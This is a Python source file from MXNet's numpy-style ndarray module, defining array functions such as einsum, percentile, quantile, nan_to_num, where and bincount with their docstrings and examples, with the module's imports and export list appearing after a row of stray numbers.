>>> np.einsum(',ij', np.array(3), c)
array([[ 0., 3., 6.],
[ 9., 12., 15.]])
>>> np.multiply(3, c)
array([[ 0., 3., 6.],
[ 9., 12., 15.]])
Vector outer product:
>>> np.einsum('i,j', np.arange(2)+1, b)
array([[0., 1., 2., 3., 4.],
[0., 2., 4., 6., 8.]])
Tensor contraction:
>>> a = np.arange(60.).reshape(3,4,5)
>>> b = np.arange(24.).reshape(4,3,2)
>>> np.einsum('ijk,jil->kl', a, b)
array([[4400., 4730.],
[4532., 4874.],
[4664., 5018.],
[4796., 5162.],
[4928., 5306.]])
Example of ellipsis use:
>>> a = np.arange(6).reshape((3,2))
>>> b = np.arange(12).reshape((4,3))
>>> np.einsum('ki,jk->ij', a, b)
array([[10., 28., 46., 64.],
[13., 40., 67., 94.]])
>>> np.einsum('ki,...k->i...', a, b)
array([[10., 28., 46., 64.],
[13., 40., 67., 94.]])
>>> np.einsum('k...,jk', a, b)
array([[10., 28., 46., 64.],
[13., 40., 67., 94.]])
Chained array operations. For more complicated contractions, speed ups
might be achieved by repeatedly computing a 'greedy' path. Performance
improvements can be particularly significant with larger arrays:
>>> a = np.ones(64).reshape(2,4,8)
# Basic `einsum`: ~42.22ms (benchmarked on 3.4GHz Intel Xeon.)
>>> for iteration in range(500):
... np.einsum('ijk,ilm,njm,nlk,abc->',a,a,a,a,a)
# Greedy `einsum` (faster optimal path approximation): ~0.117ms
>>> for iteration in range(500):
... np.einsum('ijk,ilm,njm,nlk,abc->',a,a,a,a,a, optimize=True)
"""
# Grab non-einsum kwargs; do not optimize by default.
optimize_arg = kwargs.pop('optimize', False)
out = kwargs.pop('out', None)
subscripts = operands[0]
operands = operands[1:]
return _npi.einsum(*operands, subscripts=subscripts, out=out, optimize=int(optimize_arg))
@set_module('mxnet.ndarray.numpy')
def nonzero(a):
"""
Return the indices of the elements that are non-zero.
Returns a tuple of arrays, one for each dimension of `a`,
containing the indices of the non-zero elements in that
dimension. The values in `a` are always returned in
row-major, C-style order.
To group the indices by element, rather than dimension, use `argwhere`,
which returns a row for each non-zero element.
Parameters
----------
a : ndarray
Input array.
Returns
-------
tuple_of_arrays : tuple
Indices of elements that are non-zero.
See Also
--------
ndarray.nonzero :
Equivalent ndarray method.
Notes
-----
While the nonzero values can be obtained with ``a[nonzero(a)]``, it is
recommended to use ``x[x.astype(bool)]`` or ``x[x != 0]`` instead, which
will correctly handle 0-d arrays.
Examples
--------
>>> x = np.array([[3, 0, 0], [0, 4, 0], [5, 6, 0]])
>>> x
array([[3, 0, 0],
[0, 4, 0],
[5, 6, 0]], dtype=int32)
>>> np.nonzero(x)
(array([0, 1, 2, 2], dtype=int64), array([0, 1, 0, 1], dtype=int64))
>>> x[np.nonzero(x)]
array([3, 4, 5, 6])
>>> np.transpose(np.stack(np.nonzero(x)))
array([[0, 0],
[1, 1],
[2, 0],
[2, 1]], dtype=int64)
A common use for ``nonzero`` is to find the indices of an array, where
a condition is True. Given an array `a`, the condition `a` > 3 is a
boolean array and since False is interpreted as 0, np.nonzero(a > 3)
yields the indices of the `a` where the condition is true.
>>> a = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]], dtype=np.int32)
>>> a > 3
array([[False, False, False],
[ True, True, True],
[ True, True, True]])
>>> np.nonzero(a > 3)
(array([1, 1, 1, 2, 2, 2], dtype=int64), array([0, 1, 2, 0, 1, 2], dtype=int64))
Using this result to index `a` is equivalent to using the mask directly:
>>> a[np.nonzero(a > 3)]
array([4, 5, 6, 7, 8, 9], dtype=int32)
>>> a[a > 3]
array([4, 5, 6, 7, 8, 9], dtype=int32)
``nonzero`` can also be called as a method of the array.
>>> (a > 3).nonzero()
(array([1, 1, 1, 2, 2, 2], dtype=int64), array([0, 1, 2, 0, 1, 2], dtype=int64))
"""
out = _npi.nonzero(a).transpose()
return tuple([out[i] for i in range(len(out))])
@set_module('mxnet.ndarray.numpy')
def percentile(a, q, axis=None, out=None, overwrite_input=None, interpolation='linear', keepdims=False): # pylint: disable=too-many-arguments
"""
Compute the q-th percentile of the data along the specified axis.
Returns the q-th percentile(s) of the array elements.
Parameters
----------
a : ndarray
Input array
q : ndarray
Percentile or sequence of percentiles to compute.
axis : {int, tuple of int, None}, optional
Axis or axes along which the percentiles are computed. The default is to
compute the percentile(s) along a flattened version of the array.
out : ndarray, optional
Alternative output array in which to place the result. It must have the same
shape and buffer length as the expected output, but the type (of the output)
will be cast if necessary.
overwrite_input : bool, optional (Not supported yet)
If True, then allow the input array a to be modified by intermediate calculations,
to save memory. In this case, the contents of the input a after this function
completes is undefined.
interpolation : {'linear', 'lower', 'higher', 'midpoint', 'nearest'}
This optional parameter specifies the interpolation method to use when the
desired percentile lies between two data points i < j:
'linear': i + (j - i) * fraction, where fraction is the fractional part of the
index surrounded by i and j.
'lower': i.
'higher': j.
'nearest': i or j, whichever is nearest.
'midpoint': (i + j) / 2.
keepdims : bool, optional
If this is set to True, the axes which are reduced are left in the result as
dimensions with size one. With this option, the result will broadcast
correctly against the original array a.
Returns
-------
percentile : scalar or ndarray
Output array.
Examples
--------
>>> a = np.array([[10, 7, 4], [3, 2, 1]])
>>> a
array([[10, 7, 4],
[ 3, 2, 1]])
>>> np.percentile(a, np.array(50))
array(3.5)
>>> np.percentile(a, np.array(50), axis=0)
array([6.5, 4.5, 2.5])
>>> np.percentile(a, np.array(50), axis=1)
array([7., 2.])
>>> np.percentile(a, np.array(50), axis=1, keepdims=True)
array([[7.],
[2.]])
>>> m = np.percentile(a, np.array(50), axis=0)
>>> out = np.zeros_like(m)
>>> np.percentile(a, np.array(50), axis=0, out=out)
array([6.5, 4.5, 2.5])
>>> m
array([6.5, 4.5, 2.5])
"""
if overwrite_input is not None:
raise NotImplementedError('overwrite_input is not supported yet')
if isinstance(q, numeric_types):
return _npi.percentile(a, axis=axis, interpolation=interpolation,
keepdims=keepdims, q_scalar=q, out=out)
return _npi.percentile(a, q, axis=axis, interpolation=interpolation,
keepdims=keepdims, q_scalar=None, out=out)
@set_module('mxnet.ndarray.numpy')
def quantile(a, q, axis=None, out=None, overwrite_input=None, interpolation='linear', keepdims=False): # pylint: disable=too-many-arguments
"""
Compute the q-th quantile of the data along the specified axis.
New in version 1.15.0.
Parameters
----------
a : ndarray
Input array or object that can be converted to an array.
q : ndarray
Quantile or sequence of quantiles to compute, which must be between 0 and 1 inclusive.
axis : {int, tuple of int, None}, optional
Axis or axes along which the quantiles are computed.
The default is to compute the quantile(s) along a flattened version of the array.
out : ndarray, optional
Alternative output array in which to place the result.
It must have the same shape and buffer length as the expected output,
but the type (of the output) will be cast if necessary.
interpolation : {'linear', 'lower', 'higher', 'midpoint', 'nearest'}
This optional parameter specifies the interpolation method to use
when the desired quantile lies between two data points i < j:
linear: i + (j - i) * fraction, where fraction is the fractional part of the index surrounded by i and j.
lower: i.
higher: j.
nearest: i or j, whichever is nearest.
midpoint: (i + j) / 2.
keepdims : bool, optional
If this is set to True, the axes which are reduced are left in the result as dimensions with size one.
With this option, the result will broadcast correctly against the original array a.
Returns
-------
quantile : ndarray
If q is a single quantile and axis=None, then the result is a scalar.
If multiple quantiles are given, first axis of the result corresponds to the quantiles.
The other axes are the axes that remain after the reduction of a.
If out is specified, that array is returned instead.
See also
--------
mean
Notes
-----
Given a vector V of length N, the q-th quantile of V is the value q of the way from the minimum
to the maximum in a sorted copy of V. The values and distances of the two nearest neighbors
as well as the interpolation parameter will determine the quantile if the normalized ranking
does not match the location of q exactly. This function is the same as the median if q=0.5,
the same as the minimum if q=0.0 and the same as the maximum if q=1.0.
This function differs from the original `numpy.quantile
<https://numpy.org/devdocs/reference/generated/numpy.quantile.html>`_ in
the following aspects:
- q must be ndarray type even if it is a scalar
- do not support overwrite_input
Examples
--------
>>> a = np.array([[10, 7, 4], [3, 2, 1]])
>>> a
array([[10., 7., 4.],
[3., 2., 1.]])
>>> q = np.array(0.5)
>>> q
array(0.5)
>>> np.quantile(a, q)
array(3.5)
>>> np.quantile(a, q, axis=0)
array([6.5, 4.5, 2.5])
>>> np.quantile(a, q, axis=1)
array([7., 2.])
>>> np.quantile(a, q, axis=1, keepdims=True)
array([[7.],
[2.]])
>>> m = np.quantile(a, q, axis=0)
>>> out = np.zeros_like(m)
>>> np.quantile(a, q, axis=0, out=out)
array([6.5, 4.5, 2.5])
>>> out
array([6.5, 4.5, 2.5])
"""
if overwrite_input is not None:
raise NotImplementedError('overwrite_input is not supported yet')
if isinstance(q, numeric_types):
return _npi.percentile(a, axis=axis, interpolation=interpolation,
keepdims=keepdims, q_scalar=q * 100, out=out)
return _npi.percentile(a, q * 100, axis=axis, interpolation=interpolation,
keepdims=keepdims, q_scalar=None, out=out)
@set_module('mxnet.ndarray.numpy')
def shares_memory(a, b, max_work=None):
"""
Determine if two arrays share memory
Parameters
----------
a, b : ndarray
Input arrays
Returns
-------
out : bool
See Also
--------
may_share_memory
Examples
--------
>>> np.may_share_memory(np.array([1,2]), np.array([5,8,9]))
False
This function differs from the original `numpy.shares_memory
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.shares_memory.html>`_ in
the following way(s):
- Does not support `max_work`, it is a dummy argument
- Actually it is same as `may_share_memory` in MXNet DeepNumPy
"""
return _npi.share_memory(a, b).item()
@set_module('mxnet.ndarray.numpy')
def may_share_memory(a, b, max_work=None):
"""
Determine if two arrays might share memory
A return of True does not necessarily mean that the two arrays
share any element. It just means that they *might*.
Only the memory bounds of a and b are checked by default.
Parameters
----------
a, b : ndarray
Input arrays
Returns
-------
out : bool
See Also
--------
shares_memory
Examples
--------
>>> np.may_share_memory(np.array([1,2]), np.array([5,8,9]))
False
>>> x = np.zeros([3, 4])
>>> np.may_share_memory(x[:,0], x[:,1])
True
This function differs from the original `numpy.may_share_memory
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.may_share_memory.html>`_ in
the following way(s):
- Does not support `max_work`, it is a dummy argument
- Actually it is same as `shares_memory` in MXNet DeepNumPy
"""
return _npi.share_memory(a, b).item()
@set_module('mxnet.ndarray.numpy')
def diff(a, n=1, axis=-1, prepend=None, append=None): # pylint: disable=redefined-outer-name
r"""
Calculate the n-th discrete difference along the given axis.
Parameters
----------
a : ndarray
Input array
n : int, optional
The number of times values are differenced. If zero, the input is returned as-is.
axis : int, optional
The axis along which the difference is taken, default is the last axis.
prepend, append : ndarray, optional
Not supported yet
Returns
-------
diff : ndarray
The n-th differences.
The shape of the output is the same as a except along axis where the dimension is smaller by n.
The type of the output is the same as the type of the difference between any two elements of a.
Examples
--------
>>> x = np.array([1, 2, 4, 7, 0])
>>> np.diff(x)
array([ 1, 2, 3, -7])
>>> np.diff(x, n=2)
array([ 1, 1, -10])
>>> x = np.array([[1, 3, 6, 10], [0, 5, 6, 8]])
>>> np.diff(x)
array([[2, 3, 4],
[5, 1, 2]])
>>> np.diff(x, axis=0)
array([[-1, 2, 0, -2]])
Notes
-----
Optional inputs `prepend` and `append` are not supported yet
"""
if (prepend or append):
raise NotImplementedError('prepend and append options are not supported yet')
return _npi.diff(a, n=n, axis=axis)
@set_module('mxnet.ndarray.numpy')
def resize(a, new_shape):
"""
Return a new array with the specified shape.
If the new array is larger than the original array, then the new
array is filled with repeated copies of `a`. Note that this behavior
is different from a.resize(new_shape) which fills with zeros instead
of repeated copies of `a`.
Parameters
----------
a : ndarray
Array to be resized.
new_shape : int or tuple of int
Shape of resized array.
Returns
-------
reshaped_array : ndarray
The new array is formed from the data in the old array, repeated
if necessary to fill out the required number of elements. The
data are repeated in the order that they are stored in memory.
See Also
--------
ndarray.resize : resize an array in-place.
Notes
-----
Warning: This functionality does **not** consider axes separately,
i.e. it does not apply interpolation/extrapolation.
It fills the return array with the required number of elements, taken
from `a` as they are laid out in memory, disregarding strides and axes.
(This is in case the new shape is smaller. For larger, see above.)
This functionality is therefore not suitable to resize images,
or data where each axis represents a separate and distinct entity.
Examples
--------
>>> a = np.array([[0, 1], [2, 3]])
>>> np.resize(a, (2, 3))
array([[0., 1., 2.],
[3., 0., 1.]])
>>> np.resize(a, (1, 4))
array([[0., 1., 2., 3.]])
>>> np.resize(a,(2, 4))
array([[0., 1., 2., 3.],
[0., 1., 2., 3.]])
"""
return _npi.resize_fallback(a, new_shape=new_shape)
@set_module('mxnet.ndarray.numpy')
def nan_to_num(x, copy=True, nan=0.0, posinf=None, neginf=None, **kwargs):
"""
Replace NaN with zero and infinity with large finite numbers (default
behaviour) or with the numbers defined by the user using the `nan`,
`posinf` and/or `neginf` keywords.
If `x` is inexact, NaN is replaced by zero or by the user defined value in
`nan` keyword, infinity is replaced by the largest finite floating point
values representable by ``x.dtype`` or by the user defined value in
`posinf` keyword and -infinity is replaced by the most negative finite
floating point values representable by ``x.dtype`` or by the user defined
value in `neginf` keyword.
For complex dtypes, the above is applied to each of the real and
imaginary components of `x` separately.
If `x` is not inexact, then no replacements are made.
Parameters
----------
x : ndarray
Input data.
copy : bool, optional
Whether to create a copy of `x` (True) or to replace values
in-place (False). The in-place operation only occurs if
casting to an array does not require a copy.
Default is True.
nan : int, float, optional
Value to be used to fill NaN values. If no value is passed
then NaN values will be replaced with 0.0.
posinf : int, float, optional
Value to be used to fill positive infinity values. If no value is
passed then positive infinity values will be replaced with a very
large number.
neginf : int, float, optional
Value to be used to fill negative infinity values. If no value is
passed then negative infinity values will be replaced with a very
small (or negative) number.
.. versionadded:: 1.13
Returns
-------
out : ndarray
`x`, with the non-finite values replaced. If `copy` is False, this may
be `x` itself.
Notes
-----
NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic
(IEEE 754). This means that Not a Number is not equivalent to infinity.
Examples
--------
>>> np.nan_to_num(np.inf)
1.7976931348623157e+308
>>> np.nan_to_num(-np.inf)
-1.7976931348623157e+308
>>> np.nan_to_num(np.nan)
0.0
>>> x = np.array([np.inf, -np.inf, np.nan, -128, 128])
>>> np.nan_to_num(x)
array([ 3.4028235e+38, -3.4028235e+38, 0.0000000e+00, -1.2800000e+02,
1.2800000e+02])
>>> np.nan_to_num(x, nan=-9999, posinf=33333333, neginf=33333333)
array([ 3.3333332e+07, 3.3333332e+07, -9.9990000e+03, -1.2800000e+02,
1.2800000e+02])
>>> y = np.array([[-1, 0, 1],[9999,234,-14222]],dtype="float64")/0
array([[-inf, nan, inf],
[ inf, inf, -inf]], dtype=float64)
>>> np.nan_to_num(y)
array([[-1.79769313e+308, 0.00000000e+000, 1.79769313e+308],
[ 1.79769313e+308, 1.79769313e+308, -1.79769313e+308]], dtype=float64)
>>> np.nan_to_num(y, nan=111111, posinf=222222)
array([[-1.79769313e+308, 1.11111000e+005, 2.22222000e+005],
[ 2.22222000e+005, 2.22222000e+005, -1.79769313e+308]], dtype=float64)
>>> y
array([[-inf, nan, inf],
[ inf, inf, -inf]], dtype=float64)
>>> np.nan_to_num(y, copy=False, nan=111111, posinf=222222)
array([[-1.79769313e+308, 1.11111000e+005, 2.22222000e+005],
[ 2.22222000e+005, 2.22222000e+005, -1.79769313e+308]], dtype=float64)
>>> y
array([[-1.79769313e+308, 1.11111000e+005, 2.22222000e+005],
[ 2.22222000e+005, 2.22222000e+005, -1.79769313e+308]], dtype=float64)
"""
if isinstance(x, numeric_types):
return _np.nan_to_num(x, copy, nan, posinf, neginf)
elif isinstance(x, NDArray):
if x.dtype in ['int8', 'uint8', 'int32', 'int64']:
return x
if not copy:
return _npi.nan_to_num(x, copy=copy, nan=nan, posinf=posinf, neginf=neginf, out=x)
return _npi.nan_to_num(x, copy=copy, nan=nan, posinf=posinf, neginf=neginf, out=None)
else:
raise TypeError('type {} not supported'.format(str(type(x))))
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def isnan(x, out=None, **kwargs):
"""
Test element-wise for NaN and return result as a boolean array.
Parameters
----------
x : ndarray
Input array.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape and dtype as input ndarray.
If not provided or `None`, a freshly-allocated array is returned.
Returns
-------
y : ndarray or bool
True where x is NaN, false otherwise.
This is a scalar if x is a scalar.
Notes
-----
NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic (IEEE 754).
This function differs from the original `numpy.isinf
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.isnan.html>`_ in
the following aspects:
- Does not support complex number for now
- Input type does not support Python native iterables(list, tuple, ...).
- ``out`` param: cannot perform auto broadcasting. ``out`` ndarray's shape must be the same as the expected output.
- ``out`` param: cannot perform auto type cast. ``out`` ndarray's dtype must be the same as the expected output.
- ``out`` param does not support scalar input case.
Examples
--------
>>> np.isnan(np.nan)
True
>>> np.isnan(np.inf)
False
>>> np.isnan(np.array([np.log(-1.),1.,np.log(0)]))
array([ True, False, False])
"""
return _unary_func_helper(x, _npi.isnan, _np.isnan, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def isinf(x, out=None, **kwargs):
"""
Test element-wise for positive or negative infinity.
Parameters
----------
x : ndarray
Input array.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape and dtype as input ndarray.
If not provided or `None`, a freshly-allocated array is returned.
Returns
-------
y : ndarray or bool
True where x is positive or negative infinity, false otherwise.
This is a scalar if x is a scalar.
Notes
-----
NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic (IEEE 754).
This means that Not a Number is not equivalent to infinity.
This function differs from the original `numpy.isnan
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.isnan.html>`_ in
the following aspects:
- Does not support complex number for now
- Input type does not support Python native iterables(list, tuple, ...).
- ``out`` param: cannot perform auto broadcasting. ``out`` ndarray's shape must be the same as the expected output.
- ``out`` param: cannot perform auto type cast. ``out`` ndarray's dtype must be the same as the expected output.
- ``out`` param does not support scalar input case.
Examples
--------
>>> np.isinf(np.inf)
True
>>> np.isinf(np.nan)
False
>>> np.isinf(np.array([np.inf, -np.inf, 1.0, np.nan]))
array([ True, True, False, False])
>>> x = np.array([-np.inf, 0., np.inf])
>>> y = np.array([True, True, True], dtype=np.bool_)
>>> np.isinf(x, y)
array([ True, False, True])
>>> y
array([ True, False, True])
"""
return _unary_func_helper(x, _npi.isinf, _np.isinf, out=out, **kwargs)
@wrap_np_unary_func
def isposinf(x, out=None, **kwargs):
"""
Test element-wise for positive infinity, return result as bool array.
Parameters
----------
x : ndarray
Input array.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape and dtype as input ndarray.
If not provided or `None`, a freshly-allocated array is returned.
Returns
-------
y : ndarray or bool
True where x is positive infinity, false otherwise.
This is a scalar if x is a scalar.
Notes
-----
NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic (IEEE 754).
This means that Not a Number is not equivalent to infinity.
Examples
--------
>>> np.isposinf(np.inf)
True
>>> np.isposinf(-np.inf)
False
>>> np.isposinf(np.nan)
False
>>> np.isposinf(np.array([-np.inf, 0., np.inf]))
array([False, False, True])
>>> x = np.array([-np.inf, 0., np.inf])
>>> y = np.array([True, True, True], dtype=np.bool)
>>> np.isposinf(x, y)
array([False, False, True])
>>> y
array([False, False, True])
"""
return _unary_func_helper(x, _npi.isposinf, _np.isposinf, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def isneginf(x, out=None, **kwargs):
"""
Test element-wise for negative infinity, return result as bool array.
Parameters
----------
x : ndarray
Input array.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape and dtype as input ndarray.
If not provided or `None`, a freshly-allocated array is returned.
Returns
-------
y : ndarray or bool
True where x is negative infinity, false otherwise.
This is a scalar if x is a scalar.
Notes
-----
NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic (IEEE 754).
This means that Not a Number is not equivalent to infinity.
Examples
--------
>>> np.isneginf(-np.inf)
True
>>> np.isneginf(np.inf)
False
>>> np.isneginf(float('-inf'))
True
>>> np.isneginf(np.array([-np.inf, 0., np.inf]))
array([ True, False, False])
>>> x = np.array([-np.inf, 0., np.inf])
>>> y = np.array([True, True, True], dtype=np.bool)
>>> np.isneginf(x, y)
array([ True, False, False])
>>> y
array([ True, False, False])
"""
return _unary_func_helper(x, _npi.isneginf, _np.isneginf, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
@wrap_np_unary_func
def isfinite(x, out=None, **kwargs):
"""
Test element-wise for finiteness (not infinity or not Not a Number).
Parameters
----------
x : ndarray
Input array.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape and dtype as input ndarray.
If not provided or `None`, a freshly-allocated array is returned.
Returns
-------
y : ndarray or bool
True where x is negative infinity, false otherwise.
This is a scalar if x is a scalar.
Notes
-----
Not a Number, positive infinity and negative infinity are considered to be non-finite.
NumPy uses the IEEE Standard for Binary Floating-Point for Arithmetic (IEEE 754).
This means that Not a Number is not equivalent to infinity.
Also that positive infinity is not equivalent to negative infinity.
But infinity is equivalent to positive infinity. Errors result if the second argument
is also supplied when x is a scalar input, or if first and second arguments have different shapes.
Examples
--------
>>> np.isfinite(1)
True
>>> np.isfinite(0)
True
>>> np.isfinite(np.nan)
False
>>> np.isfinite(np.inf)
False
>>> np.isfinite(-np.inf)
False
>>> np.isfinite(np.array([np.log(-1.),1.,np.log(0)]))
array([False, True, False])
>>> x = np.array([-np.inf, 0., np.inf])
>>> y = np.array([True, True, True], dtype=np.bool)
>>> np.isfinite(x, y)
array([False, True, False])
>>> y
array([False, True, False])
"""
return _unary_func_helper(x, _npi.isfinite, _np.isfinite, out=out, **kwargs)
@set_module('mxnet.ndarray.numpy')
def where(condition, x=None, y=None): # pylint: disable=too-many-return-statements
"""where(condition, [x, y])
Return elements chosen from `x` or `y` depending on `condition`.
.. note::
When only `condition` is provided, this function is a shorthand for
``np.asarray(condition).nonzero()``. The rest of this documentation
covers only the case where all three arguments are provided.
Parameters
----------
condition : ndarray
Where True, yield `x`, otherwise yield `y`.
x, y : ndarray
Values from which to choose. `x`, `y` and `condition` need to be
broadcastable to some shape. `x` and `y` must have the same dtype.
Returns
-------
out : ndarray
An array with elements from `x` where `condition` is True, and elements
from `y` elsewhere.
Notes
-----
If all the arrays are 1-D, `where` is equivalent to::
[xv if c else yv
for c, xv, yv in zip(condition, x, y)]
This function differs from the original `numpy.where
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.where.html>`_ in
the following way(s):
- If `condition` is a scalar, this operator returns x or y directly without broadcasting.
- If `condition` is ndarray, while both `x` and `y` are scalars,
the output dtype will be `float32`.
Examples
--------
>>> a = np.arange(10)
>>> a
array([0., 1., 2., 3., 4., 5., 6., 7., 8., 9.])
>>> np.where(a < 5, a, 10*a)
array([ 0., 1., 2., 3., 4., 50., 60., 70., 80., 90.])
This can be used on multidimensional arrays too:
>>> cond = np.array([[True, False], [True, True]])
>>> x = np.array([[1, 2], [3, 4]])
>>> y = np.array([[9, 8], [7, 6]])
>>> np.where(cond, x, y)
array([[1., 8.],
[3., 4.]])
The shapes of x, y, and the condition are broadcast together:
>>> x, y = onp.ogrid[:3, :4]
>>> x = np.array(x)
>>> y = np.array(y)
>>> np.where(x < y, x, 10 + y) # both x and 10+y are broadcast
array([[10, 0, 0, 0],
[10, 11, 1, 1],
[10, 11, 12, 2]], dtype=int64)
>>> a = np.array([[0, 1, 2],
... [0, 2, 4],
... [0, 3, 6]])
>>> np.where(a < 4, a, -1) # -1 is broadcast
array([[ 0., 1., 2.],
[ 0., 2., -1.],
[ 0., 3., -1.]])
"""
if x is None and y is None:
return nonzero(condition)
else:
if isinstance(condition, numeric_types):
if condition != 0:
return x
else:
return y
else:
if isinstance(x, numeric_types) and isinstance(y, numeric_types):
return _npi.where_scalar2(condition, float(x), float(y), out=None)
elif isinstance(x, NDArray) and isinstance(y, NDArray):
return _npi.where(condition, x, y, out=None)
elif isinstance(y, NDArray):
return _npi.where_lscalar(condition, y, float(x), out=None)
elif isinstance(x, NDArray):
return _npi.where_rscalar(condition, x, float(y), out=None)
else:
raise TypeError('type {0} and {1} not supported'.format(str(type(x)), str(type(y))))
@set_module('mxnet.ndarray.numpy')
def polyval(p, x):
"""
Evaluate a polynomial at specific values.
If p is of length N, this function returns the value:
p[0]*x**(N-1) + p[1]*x**(N-2) + ... + p[N-2]*x + p[N-1]
If x is a sequence, then p(x) is returned for each element of x.
If x is another polynomial then the composite polynomial p(x(t)) is returned.
Parameters
----------
p : ndarray
1D array of polynomial coefficients (including coefficients equal to zero)
from highest degree to the constant term.
x : ndarray
An array of numbers, at which to evaluate p.
Returns
-------
values : ndarray
Result array of polynomials
Notes
-----
This function differs from the original `numpy.polyval
<https://numpy.org/devdocs/reference/generated/numpy.polyval.html>`_ in
the following way(s):
- Does not support poly1d.
- X should be ndarray type even if it contains only one element.
Examples
--------
>>> p = np.array([3, 0, 1])
array([3., 0., 1.])
>>> x = np.array([5])
array([5.])
>>> np.polyval(p, x) # 3 * 5**2 + 0 * 5**1 + 1
array([76.])
>>> x = np.array([5, 4])
array([5., 4.])
>>> np.polyval(p, x)
array([76., 49.])
"""
from ...numpy import ndarray
if isinstance(p, ndarray) and isinstance(x, ndarray):
return _npi.polyval(p, x)
elif not isinstance(p, ndarray) and not isinstance(x, ndarray):
return _np.polyval(p, x)
else:
raise TypeError('type not supported')
@set_module('mxnet.ndarray.numpy')
def bincount(x, weights=None, minlength=0):
"""
Count number of occurrences of each value in array of non-negative ints.
Parameters
----------
x : ndarray
input array, 1 dimension, nonnegative ints.
weights: ndarray
input weigths same shape as x. (Optional)
minlength: int
A minimum number of bins for the output. (Optional)
Returns
--------
out : ndarray
the result of binning the input array. The length of out is equal to amax(x)+1.
Raises
--------
Value Error
If the input is not 1-dimensional, or contains elements with negative values,
or if minlength is negative
TypeError
If the type of the input is float or complex.
Examples
--------
>>> np.bincount(np.arange(5))
array([1, 1, 1, 1, 1])
>>> np.bincount(np.array([0, 1, 1, 3, 2, 1, 7]))
array([1, 3, 1, 1, 0, 0, 0, 1])
>>> x = np.array([0, 1, 1, 3, 2, 1, 7, 23])
>>> np.bincount(x).size == np.amax(x)+1
True
>>> np.bincount(np.arange(5, dtype=float))
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: array cannot be safely cast to required type
>>> w = np.array([0.3, 0.5, 0.2, 0.7, 1., -0.6]) # weights
>>> x = np.array([0, 1, 1, 2, 2, 2])
>>> np.bincount(x, weights=w)
array([ 0.3, 0.7, 1.1])
"""
if not isinstance(x, NDArray):
raise TypeError("Input data should be NDarray")
if minlength < 0:
raise ValueError("Minlength value should greater than 0")
if weights is None:
return _npi.bincount(x, minlength=minlength, has_weights=False)
return _npi.bincount(x, weights=weights, minlength=minlength, has_weights=True)
| 33.558652 | 141 | 0.604846 |
import numpy as _np
from ...base import numeric_types, integer_types
from ...util import _sanity_check_params, set_module
from ...util import wrap_np_unary_func, wrap_np_binary_func
from ...context import current_context
from . import _internal as _npi
from ..ndarray import NDArray
__all__ = ['shape', 'zeros', 'zeros_like', 'ones', 'ones_like', 'full', 'full_like', 'empty_like', 'invert', 'delete',
'add', 'broadcast_to', 'subtract', 'multiply', 'divide', 'mod', 'remainder', 'power', 'bitwise_not',
'arctan2', 'sin', 'cos', 'tan', 'sinh', 'cosh', 'tanh', 'log10', 'sqrt', 'cbrt', 'abs', 'insert',
'absolute', 'exp', 'expm1', 'arcsin', 'arccos', 'arctan', 'sign', 'log', 'degrees', 'log2', 'matmul',
'log1p', 'rint', 'radians', 'reciprocal', 'square', 'negative', 'fix', 'ceil', 'floor', 'histogram',
'trunc', 'logical_not', 'arcsinh', 'arccosh', 'arctanh', 'argsort', 'sort',
'tensordot', 'eye', 'linspace',
'logspace', 'expand_dims', 'tile', 'arange', 'array_split', 'split', 'hsplit', 'vsplit', 'dsplit',
'concatenate', 'append', 'stack', 'vstack', 'row_stack', 'column_stack', 'hstack', 'dstack',
'average', 'mean', 'maximum', 'minimum',
'swapaxes', 'clip', 'argmax', 'argmin', 'std', 'var', 'indices', 'copysign', 'ravel', 'unravel_index',
'diag_indices_from', 'hanning', 'hamming', 'blackman', 'flip', 'flipud', 'fliplr', 'around', 'round',
'hypot', 'bitwise_and', 'bitwise_xor', 'bitwise_or', 'rad2deg', 'deg2rad', 'unique', 'lcm',
'tril', 'identity', 'take', 'ldexp', 'vdot', 'inner', 'outer',
'equal', 'not_equal', 'greater', 'less', 'greater_equal', 'less_equal', 'rot90', 'einsum',
'true_divide', 'nonzero', 'quantile', 'percentile', 'shares_memory', 'may_share_memory',
'diff', 'resize', 'polyval', 'nan_to_num', 'isnan', 'isinf', 'isposinf', 'isneginf', 'isfinite',
'where', 'bincount']
@set_module('mxnet.ndarray.numpy')
def shape(a):
return a.shape
@set_module('mxnet.ndarray.numpy')
def zeros(shape, dtype=_np.float32, order='C', ctx=None):
if order != 'C':
raise NotImplementedError
if ctx is None:
ctx = current_context()
dtype = _np.float32 if dtype is None else dtype
return _npi.zeros(shape=shape, ctx=ctx, dtype=dtype)
@set_module('mxnet.ndarray.numpy')
def ones(shape, dtype=_np.float32, order='C', ctx=None):
if order != 'C':
raise NotImplementedError
if ctx is None:
ctx = current_context()
dtype = _np.float32 if dtype is None else dtype
return _npi.ones(shape=shape, ctx=ctx, dtype=dtype)
@set_module('mxnet.ndarray.numpy')
def zeros_like(a, dtype=None, order='C', ctx=None, out=None):
if order != 'C':
raise NotImplementedError
if ctx is None:
ctx = current_context()
return _npi.full_like(a, fill_value=0, dtype=dtype, ctx=ctx, out=out)
@set_module('mxnet.ndarray.numpy')
def ones_like(a, dtype=None, order='C', ctx=None, out=None):
if order != 'C':
raise NotImplementedError
if ctx is None:
ctx = current_context()
return _npi.full_like(a, fill_value=1, dtype=dtype, ctx=ctx, out=out)
@set_module('mxnet.ndarray.numpy')
def broadcast_to(array, shape):
if _np.isscalar(array):
return full(shape, array)
